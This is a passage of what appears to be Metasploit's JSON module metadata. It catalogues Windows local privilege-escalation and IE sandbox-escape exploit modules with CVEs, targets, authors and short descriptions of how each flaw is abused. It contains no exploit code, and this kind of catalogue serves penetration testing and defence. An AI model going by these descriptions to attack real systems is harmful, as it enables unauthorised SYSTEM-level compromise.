"OSVDB-3106",
"URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/current_user_psexec.rb",
"is_install_path": true,
"ref_name": "windows/local/current_user_psexec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/cve_2017_8464_lnk_lpe": {
"name": "LNK Code Execution Vulnerability",
"full_name": "exploit/windows/local/cve_2017_8464_lnk_lpe",
"rank": 600,
"disclosure_date": "2017-06-13",
"type": "exploit",
"author": [
"Uncredited",
"Yorick Koster",
"Spencer McIntyre"
],
"description": "This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)\n that contain a dynamic icon, loaded from a malicious DLL.\n\n This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is\n similar except an additional SpecialFolderDataBlock is included. The folder ID set\n in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass\n the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary\n DLL file.\n\n The PATH option must be an absolute path to a writeable directory which is indexed for\n searching. If no PATH is specified, the module defaults to %USERPROFILE%.",
"references": [
"CVE-2017-8464",
"URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464",
"URL-http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt",
"URL-https://msdn.microsoft.com/en-us/library/dd871305.aspx",
"URL-http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm",
"URL-https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x64",
"Windows x86"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb",
"is_install_path": true,
"ref_name": "windows/local/cve_2017_8464_lnk_lpe",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-service-restarts"
],
"SideEffects": [
"artifacts-on-disk"
]
}
},
"exploit_windows/local/ikeext_service": {
"name": "IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL",
"full_name": "exploit/windows/local/ikeext_service",
"rank": 400,
"disclosure_date": "2012-10-09",
"type": "exploit",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module exploits a missing DLL loaded by the 'IKE and AuthIP Keyring Modules'\n (IKEEXT) service which runs as SYSTEM, and starts automatically in default\n installations of Vista-Win8. It requires an insecure bin path to plant the DLL payload.",
"references": [
"URL-https://www.htbridge.com/advisory/HTB23108",
"URL-https://www.htbridge.com/vulnerability/uncontrolled-search-path-element.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/ikeext_service.rb",
"is_install_path": true,
"ref_name": "windows/local/ikeext_service",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ipass_launch_app": {
"name": "iPass Mobile Client Service Privilege Escalation",
"full_name": "exploit/windows/local/ipass_launch_app",
"rank": 600,
"disclosure_date": "2015-03-12",
"type": "exploit",
"author": [
"h0ng10"
],
"description": "The named pipe, \\IPEFSYSPCPIPE, can be accessed by normal users to interact\n with the iPass service. The service provides a LaunchAppSysMode command which\n allows to execute arbitrary commands as SYSTEM.",
"references": [
"CVE-2015-0925",
"URL-https://www.mogwaisecurity.de/advisories/MSA-2015-03.txt"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/local/ipass_launch_app.rb",
"is_install_path": true,
"ref_name": "windows/local/ipass_launch_app",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/lenovo_systemupdate": {
"name": "Lenovo System Update Privilege Escalation",
"full_name": "exploit/windows/local/lenovo_systemupdate",
"rank": 600,
"disclosure_date": "2015-04-12",
"type": "exploit",
"author": [
"Michael Milvich",
"Sofiane Talmat",
"h0ng10"
],
"description": "The named pipe, \\SUPipeServer, can be accessed by normal users to interact with the\n System update service. The service provides the possibility to execute arbitrary\n commands as SYSTEM if a valid security token is provided. This token can be generated\n by calling the GetSystemInfoData function in the DLL tvsutil.dll. Please, note that the\n System Update is stopped by default but can be started/stopped calling the Executable\n ConfigService.exe.",
"references": [
"OSVDB-121522",
"CVE-2015-2219",
"URL-http://www.ioactive.com/pdfs/Lenovo_System_Update_Multiple_Privilege_Escalations.pdf"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/lenovo_systemupdate.rb",
"is_install_path": true,
"ref_name": "windows/local/lenovo_systemupdate",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/mov_ss": {
"name": "Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability",
"full_name": "exploit/windows/local/mov_ss",
"rank": 600,
"disclosure_date": "2018-05-08",
"type": "exploit",
"author": [
"Nick Peterson",
"Nemanja Mulasmajic",
"Can Bölük <can1357>",
"bwatters-r7"
],
"description": "This module exploits a vulnerability in a statement in the system programming guide\n of the Intel 64 and IA-32 architectures software developer's manual being mishandled\n in various operating system kerneles, resulting in unexpected behavior for #DB\n excpetions that are deferred by MOV SS or POP SS.\n\n This module will upload the pre-compiled exploit and use it to execute the final\n payload in order to gain remote code execution.",
"references": [
"CVE-2018-8897",
"EDB-44697",
"BID-104071",
"URL-https://github.com/can1357/CVE-2018-8897/",
"URL-https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x64"
],
"mod_time": "2018-07-27 11:35:31 +0000",
"path": "/modules/exploits/windows/local/mov_ss.rb",
"is_install_path": true,
"ref_name": "windows/local/mov_ss",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/mqac_write": {
"name": "MQAC.sys Arbitrary Write Privilege Escalation",
"full_name": "exploit/windows/local/mqac_write",
"rank": 200,
"disclosure_date": "2014-07-22",
"type": "exploit",
"author": [
"Matt Bergin",
"Spencer McIntyre"
],
"description": "A vulnerability within the MQAC.sys module allows an attacker to\n overwrite an arbitrary location in kernel memory.\n\n This module will elevate itself to SYSTEM, then inject the payload\n into another SYSTEM process.",
"references": [
"CVE-2014-4971",
"EDB-34112",
"URL-https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/windows/local/mqac_write.rb",
"is_install_path": true,
"ref_name": "windows/local/mqac_write",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-os-restarts"
]
}
},
"exploit_windows/local/ms10_015_kitrap0d": {
"name": "Windows SYSTEM Escalation via KiTrap0D",
"full_name": "exploit/windows/local/ms10_015_kitrap0d",
"rank": 500,
"disclosure_date": "2010-01-19",
"type": "exploit",
"author": [
"Tavis Ormandy",
"HD Moore",
"Pusscat",
"OJ Reeves"
],
"description": "This module will create a new session with SYSTEM privileges via the\n KiTrap0D exploit by Tavis Ormandy. If the session in use is already\n elevated then the exploit will not run. The module relies on kitrap0d.x86.dll,\n and is not supported on x64 editions of Windows.",
"references": [
"CVE-2010-0232",
"OSVDB-61854",
"MSB-MS10-015",
"EDB-11199",
"URL-https://seclists.org/fulldisclosure/2010/Jan/341"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2K SP4 - Windows 7 (x86)"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/local/ms10_015_kitrap0d.rb",
"is_install_path": true,
"ref_name": "windows/local/ms10_015_kitrap0d",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ms10_092_schelevator": {
"name": "Windows Escalate Task Scheduler XML Privilege Escalation",
"full_name": "exploit/windows/local/ms10_092_schelevator",
"rank": 600,
"disclosure_date": "2010-09-13",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.\n When processing task files, the Windows Task Scheduler only uses a CRC32\n checksum to validate that the file has not been tampered with. Also, In a default\n configuration, normal users can read and write the task files that they have\n created. By modifying the task file and creating a CRC32 collision, an attacker\n can execute arbitrary commands with SYSTEM privileges.\n\n NOTE: Thanks to webDEViL for the information about disable/enable.",
"references": [
"OSVDB-68518",
"CVE-2010-3338",
"BID-44357",
"MSB-MS10-092",
"EDB-15589"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Vista, 7, and 2008"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/ms10_092_schelevator.rb",
"is_install_path": true,
"ref_name": "windows/local/ms10_092_schelevator",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ms11_080_afdjoinleaf": {
"name": "MS11-080 AfdJoinLeaf Privilege Escalation",
"full_name": "exploit/windows/local/ms11_080_afdjoinleaf",
"rank": 200,
"disclosure_date": "2011-11-30",
"type": "exploit",
"author": [
"Matteo Memelli",
"Spencer McIntyre"
],
"description": "This module exploits a flaw in the AfdJoinLeaf function of the\n afd.sys driver to overwrite data in kernel space. An address\n within the HalDispatchTable is overwritten and when triggered\n with a call to NtQueryIntervalProfile will execute shellcode.\n\n This module will elevate itself to SYSTEM, then inject the payload\n into another SYSTEM process before restoring its own token to\n avoid causing system instability.",
"references": [
"CVE-2011-2005",
"OSVDB-76232",
"EDB-18176",
"MSB-MS11-080",
"URL-http://www.offensive-security.com/vulndev/ms11-080-voyage-into-ring-zero/"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows XP SP2 / SP3",
"Windows Server 2003 SP2"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb",
"is_install_path": true,
"ref_name": "windows/local/ms11_080_afdjoinleaf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-os-restarts"
]
}
},
"exploit_windows/local/ms13_005_hwnd_broadcast": {
"name": "MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation",
"full_name": "exploit/windows/local/ms13_005_hwnd_broadcast",
"rank": 600,
"disclosure_date": "2012-11-27",
"type": "exploit",
"author": [
"Tavis Ormandy",
"Axel Souchet",
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "Due to a problem with isolating window broadcast messages in the Windows kernel,\n an attacker can broadcast commands from a lower Integrity Level process to a\n higher Integrity Level process, thereby effecting a privilege escalation. This\n issue affects Windows Vista, 7, 8, Server 2008, Server 2008 R2, Server 2012, and\n RT. Note that spawning a command prompt with the shortcut key combination Win+Shift+#\n does not work in Vista, so the attacker will have to check if the user is already\n running a command prompt and set SPAWN_PROMPT false.\n\n Three exploit techniques are available with this module. The WEB technique will\n execute a powershell encoded payload from a Web location. The FILE technique\n will drop an executable to the file system, set it to medium integrity and execute\n it. The TYPE technique will attempt to execute a powershell encoded payload directly\n from the command line, but may take some time to complete.",
"references": [
"CVE-2013-0008",
"MSB-MS13-005",
"OSVDB-88966",
"URL-http://blog.cmpxchg8b.com/2013/02/a-few-years-ago-while-working-on.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb",
"is_install_path": true,
"ref_name": "windows/local/ms13_005_hwnd_broadcast",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ms13_053_schlamperei": {
"name": "Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)",
"full_name": "exploit/windows/local/ms13_053_schlamperei",
"rank": 200,
"disclosure_date": "2013-12-01",
"type": "exploit",
"author": [
"Nils",
"Jon",
"Donato Capitella <donato.capitella@mwrinfosecurity.com>",
"Ben Campbell <ben.campbell@mwrinfosecurity.com>"
],
"description": "This module leverages a kernel pool overflow in Win32k which allows local privilege escalation.\n The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process).\n This allows any unprivileged process to freely migrate to winlogon.exe, achieving\n privilege escalation. This exploit was used in pwn2own 2013 by MWR to break out of chrome's sandbox.\n NOTE: when a meterpreter session started by this exploit exits, winlogin.exe is likely to crash.",
"references": [
"CVE-2013-1300",
"MSB-MS13-053",
"URL-https://labs.mwrinfosecurity.com/blog/2013/09/06/mwr-labs-pwn2own-2013-write-up---kernel-exploit/"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 7 SP0/SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/ms13_053_schlamperei.rb",
"is_install_path": true,
"ref_name": "windows/local/ms13_053_schlamperei",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ms13_081_track_popup_menu": {
"name": "Windows TrackPopupMenuEx Win32k NULL Page",
"full_name": "exploit/windows/local/ms13_081_track_popup_menu",
"rank": 200,
"disclosure_date": "2013-10-08",
"type": "exploit",
"author": [
"Seth Gibson",
"Dan Zentner",
"Matias Soler",
"Spencer McIntyre"
],
"description": "This module exploits a vulnerability in win32k.sys where under\n specific conditions TrackPopupMenuEx will pass a NULL pointer to\n the MNEndMenuState procedure. This module has been tested\n successfully on Windows 7 SP0 and Windows 7 SP1.",
"references": [
"CVE-2013-3881",
"OSVDB-98212",
"BID-62830",
"MSB-MS13-081",
"URL-http://endgame.com/news/microsoft-win32k-null-page-vulnerability-technical-analysis.html",
"URL-http://immunityproducts.blogspot.com/2013/11/exploiting-cve-2013-3881-win32k-null.html"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 7 SP0/SP1"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/windows/local/ms13_081_track_popup_menu.rb",
"is_install_path": true,
"ref_name": "windows/local/ms13_081_track_popup_menu",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-os-restarts"
]
}
},
"exploit_windows/local/ms13_097_ie_registry_symlink": {
"name": "MS13-097 Registry Symlink IE Sandbox Escape",
"full_name": "exploit/windows/local/ms13_097_ie_registry_symlink",
"rank": 500,
"disclosure_date": "2013-12-10",
"type": "exploit",
"author": [
"James Forshaw",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in Internet Explorer Sandbox which allows to\n escape the Enhanced Protected Mode and execute code with Medium Integrity. The\n vulnerability exists in the IESetProtectedModeRegKeyOnly function from the ieframe.dll\n component, which can be abused to force medium integrity IE to user influenced keys.\n By using registry symlinks it's possible force IE to add a policy entry in the registry\n and finally bypass Enhanced Protected Mode.",
"references": [
"CVE-2013-5045",
"MSB-MS13-097",
"BID-64115",
"URL-https://github.com/tyranid/IE11SandboxEscapes"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IE 8 - 11"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb",
"is_install_path": true,
"ref_name": "windows/local/ms13_097_ie_registry_symlink",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ms14_009_ie_dfsvc": {
"name": "MS14-009 .NET Deployment Service IE Sandbox Escape",
"full_name": "exploit/windows/local/ms14_009_ie_dfsvc",
"rank": 500,
"disclosure_date": "2014-02-11",
"type": "exploit",
"author": [
"James Forshaw",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses a process creation policy in Internet Explorer's sandbox, specifically\n in the .NET Deployment Service (dfsvc.exe), which allows the attacker to escape the\n Enhanced Protected Mode, and execute code with Medium Integrity.",
"references": [
"CVE-2014-0257",
"MSB-MS14-009",
"BID-65417",
"URL-https://github.com/tyranid/IE11SandboxEscapes"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IE 8 - 11"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb",
"is_install_path": true,
"ref_name": "windows/local/ms14_009_ie_dfsvc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ms14_058_track_popup_menu": {
"name": "Windows TrackPopupMenu Win32k NULL Pointer Dereference",
"full_name": "exploit/windows/local/ms14_058_track_popup_menu",
"rank": 300,
"disclosure_date": "2014-10-14",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>",
"Spencer McIntyre",
"OJ Reeves <oj@buffered.io>"
],
"description": "This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability\n can be triggered through the use of TrackPopupMenu. Under special conditions, the\n NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary\n code execution. This module has been tested successfully on Windows XP SP3, Windows\n 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows\n 2008 R2 SP1 64 bits.",
"references": [
"CVE-2014-4113",
"OSVDB-113167",
"BID-70364",
"MSB-MS14-058",
"URL-http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/windows/local/ms14_058_track_popup_menu.rb",
"is_install_path": true,
"ref_name": "windows/local/ms14_058_track_popup_menu",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-os-restarts"
]
}
},
"exploit_windows/local/ms14_070_tcpip_ioctl": {
"name": "MS14-070 Windows tcpip!SetAddrOptions NULL Pointer Dereference",
"full_name": "exploit/windows/local/ms14_070_tcpip_ioctl",
"rank": 200,
"disclosure_date": "2014-11-11",
"type": "exploit",
"author": [
"Matt Bergin <level@korelogic.com>",
"Jay Smith <jsmith@korelogic.com>"
],
"description": "A vulnerability within the Microsoft TCP/IP protocol driver tcpip.sys\n can allow a local attacker to trigger a NULL pointer dereference by using a\n specially crafted IOCTL. This flaw can be abused to elevate privileges to\n SYSTEM.",
"references": [
"CVE-2014-4076",
"MSB-MS14-070",
"OSVDB-114532",
"URL-https://blog.korelogic.com/blog/2015/01/28/2k3_tcpip_setaddroptions_exploit_dev",
"URL-https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Server 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb",
"is_install_path": true,
"ref_name": "windows/local/ms14_070_tcpip_ioctl",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ms15_004_tswbproxy": {
"name": "MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape",
"full_name": "exploit/windows/local/ms15_004_tswbproxy",
"rank": 400,
"disclosure_date": "2015-01-13",
"type": "exploit",
"author": [
"Unknown",
"Henry Li",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses a process creation policy in Internet Explorer's\n sandbox; specifically, Microsoft's RemoteApp and Desktop Connections runtime\n proxy, TSWbPrxy.exe. This vulnerability allows the attacker to escape the\n Protected Mode and execute code with Medium Integrity. At the moment, this\n module only bypass Protected Mode on Windows 7 SP1 and prior (32 bits). This\n module has been tested successfully on Windows 7 SP1 (32 bits) with IE 8 and IE\n 11.",
"references": [
"CVE-2015-0016",
"MSB-MS15-004",
"URL-http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2015-0016-escaping-the-internet-explorer-sandbox/"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Protected Mode (Windows 7) / 32 bits"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/ms15_004_tswbproxy.rb",
"is_install_path": true,
"ref_name": "windows/local/ms15_004_tswbproxy",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ms15_051_client_copy_image": {
"name": "Windows ClientCopyImage Win32k Exploit",
"full_name": "exploit/windows/local/ms15_051_client_copy_image",
"rank": 300,
"disclosure_date": "2015-05-12",
"type": "exploit",
"author": [
"Unknown",
"hfirefox",
"OJ Reeves",
"Spencer McIntyre"
],
"description": "This module exploits improper object handling in the win32k.sys kernel mode driver.\n This module has been tested on vulnerable builds of Windows 7 x64 and x86, and\n Windows 2008 R2 SP1 x64.",
"references": [
"CVE-2015-1701",
"MSB-MS15-051",
"URL-https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html",
"URL-https://github.com/hfiref0x/CVE-2015-1701",
"URL-https://technet.microsoft.com/library/security/MS15-051"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/windows/local/ms15_051_client_copy_image.rb",
"is_install_path": true,
"ref_name": "windows/local/ms15_051_client_copy_image",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-os-restarts"
]
}
},
"exploit_windows/local/ms15_078_atmfd_bof": {
"name": "MS15-078 Microsoft Windows Font Driver Buffer Overflow",
"full_name": "exploit/windows/local/ms15_078_atmfd_bof",
"rank": 0,
"disclosure_date": "2015-07-11",
"type": "exploit",
"author": [
"Eugene Ching",
"Mateusz Jurczyk",
"Cedric Halbronn",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a pool based buffer overflow in the atmfd.dll driver when parsing\n a malformed font. The vulnerability was exploited by the hacking team and disclosed in\n the July data leak. This module has been tested successfully on vulnerable builds of\n Windows 8.1 x64.",
"references": [
"CVE-2015-2426",
"CVE-2015-2433",
"MSB-MS15-078",
"MSB-MS15-080",
"URL-https://github.com/vlad902/hacking-team-windows-kernel-lpe",
"URL-https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2015/september/exploiting-cve-2015-2426-and-how-i-ported-it-to-a-recent-windows-8.1-64-bit/",
"URL-https://code.google.com/p/google-security-research/issues/detail?id=369",
"URL-https://code.google.com/p/google-security-research/issues/detail?id=480"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 8.1 x64"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/local/ms15_078_atmfd_bof.rb",
"is_install_path": true,
"ref_name": "windows/local/ms15_078_atmfd_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ms16_014_wmi_recv_notif": {
"name": "Windows WMI Recieve Notification Exploit",
"full_name": "exploit/windows/local/ms16_014_wmi_recv_notif",
"rank": 300,
"disclosure_date": "2015-12-04",
"type": "exploit",
"author": [
"smmrootkit",
"de7ec7ed",
"de7ec7ed"
],
"description": "This module exploits an uninitialized stack variable in the WMI subsystem of ntoskrnl.\n This module has been tested on vulnerable builds of Windows 7 SP0 x64 and Windows 7 SP1 x64.",
"references": [
"CVE-2016-0040",
"MSB-MS16-014",
"URL-https://github.com/de7ec7ed/CVE-2016-0040",
"URL-https://github.com/Rootkitsmm/cve-2016-0040",
"URL-https://technet.microsoft.com/en-us/library/security/ms16-014.aspx"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 7 SP0/SP1"
],
"mod_time": "2018-05-03 11:30:05 +0000",
"path": "/modules/exploits/windows/local/ms16_014_wmi_recv_notif.rb",
"is_install_path": true,
"ref_name": "windows/local/ms16_014_wmi_recv_notif",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ms16_016_webdav": {
"name": "MS16-016 mrxdav.sys WebDav Local Privilege Escalation",
"full_name": "exploit/windows/local/ms16_016_webdav",
"rank": 600,
"disclosure_date": "2016-02-09",
"type": "exploit",
"author": [
"Tamas Koczka",
"William Webb <william_webb@rapid7.com>"
],
"description": "This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn\n a process on the target system and elevate its privileges to NT AUTHORITY\\SYSTEM before executing\n the specified payload within the context of the elevated process.",
"references": [
"CVE-2016-0051",
"MSB-MS16-016"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 7 SP1"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/local/ms16_016_webdav.rb",
"is_install_path": true,
"ref_name": "windows/local/ms16_016_webdav",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ms16_032_secondary_logon_handle_privesc": {
"name": "MS16-032 Secondary Logon Handle Privilege Escalation",
"full_name": "exploit/windows/local/ms16_032_secondary_logon_handle_privesc",
"rank": 300,
"disclosure_date": "2016-03-21",
"type": "exploit",
"author": [
"James Forshaw",
"b33f",
"khr0x40sh"
],
"description": "This module exploits the lack of sanitization of standard handles in Windows' Secondary\n Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12\n 32 and 64 bit. This module will only work against those versions of Windows with\n Powershell 2.0 or later and systems with two or more CPU cores.",
"references": [
"MS-MS16-032",
"CVE-2016-0099",
"URL-https://twitter.com/FuzzySec/status/723254004042612736",
"URL-https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb",
"is_install_path": true,
"ref_name": "windows/local/ms16_032_secondary_logon_handle_privesc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ms16_075_reflection": {
"name": "Windows Net-NTLMv2 Reflection DCOM/RPC",
"full_name": "exploit/windows/local/ms16_075_reflection",
"rank": 300,
"disclosure_date": "2016-01-16",
"type": "exploit",
"author": [
"FoxGloveSec",
"breenmachine",
"Mumbai"
],
"description": "Module utilizes the Net-NTLMv2 reflection between DCOM/RPC\n to achieve a SYSTEM handle for elevation of privilege. Currently the module\n does not spawn as SYSTEM, however once achieving a shell, one can easily\n use incognito to impersonate the token.",
"references": [
"MSB-MS16-075",
"CVE-2016-3225",
"URL-http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/",
"URL-https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/",
"URL-https://github.com/breenmachine/RottenPotatoNG"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows x86",
"Windows x64"
],
"mod_time": "2018-10-04 16:38:35 +0000",
"path": "/modules/exploits/windows/local/ms16_075_reflection.rb",
"is_install_path": true,
"ref_name": "windows/local/ms16_075_reflection",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ms16_075_reflection_juicy": {
"name": "Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)",
"full_name": "exploit/windows/local/ms16_075_reflection_juicy",
"rank": 500,
"disclosure_date": "2016-01-16",
"type": "exploit",
"author": [
"FoxGloveSec",
"breenmachine",
"decoder",
"ohpe",
"phra",
"lupman"
],
"description": "This module utilizes the Net-NTLMv2 reflection between DCOM/RPC\n to achieve a SYSTEM handle for elevation of privilege.\n It requires a CLSID string.",
"references": [
"MSB-MS16-075",
"CVE-2016-3225",
"URL-http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/",
"URL-https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/",
"URL-https://github.com/breenmachine/RottenPotatoNG",
"URL-https://decoder.cloud/2017/12/23/the-lonely-potato/",
"URL-https://ohpe.it/juicy-potato/"
],
"platform": "Windows",
